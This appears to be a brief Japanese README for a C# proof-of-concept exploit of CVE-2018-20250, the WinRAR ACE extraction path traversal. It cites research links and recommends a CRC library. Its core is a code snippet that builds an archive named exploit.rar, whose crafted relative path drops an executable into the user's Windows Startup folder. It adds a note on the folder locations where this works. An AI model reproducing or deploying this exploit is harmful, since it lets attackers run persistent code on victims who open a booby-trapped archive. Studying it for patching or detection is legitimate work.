
WinRAR ACEファイル展開パスを悪用するC#製の概念実証コード(CVE-2018-20250)。
WinRAR ACEファイル展開パス(CVE-2018-20250)を悪用するためのC#による概念実証コード。
https://research.checkpoint.com/extracting-code-execution-from-winrar/ https://github.com/droe/acefile https://apidoc.roe.ch/acefile/latest/
チェックサム方式にはInvertedTomato.Crc(NuGetでインストール可能)を使用します。他のJAMCRC実装でも代用できます。
AceVolume av = new AceVolume();
AceFile f = new AceFile(
@"D:\some_file.exe",
@"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\some_file.exe"
);
av.AddFile(f);
av.Save("exploit.rar");
.rarファイルがデスクトップまたは同じ階層のフォルダにある場合にのみ、スタートアップフォルダへ展開されるようです。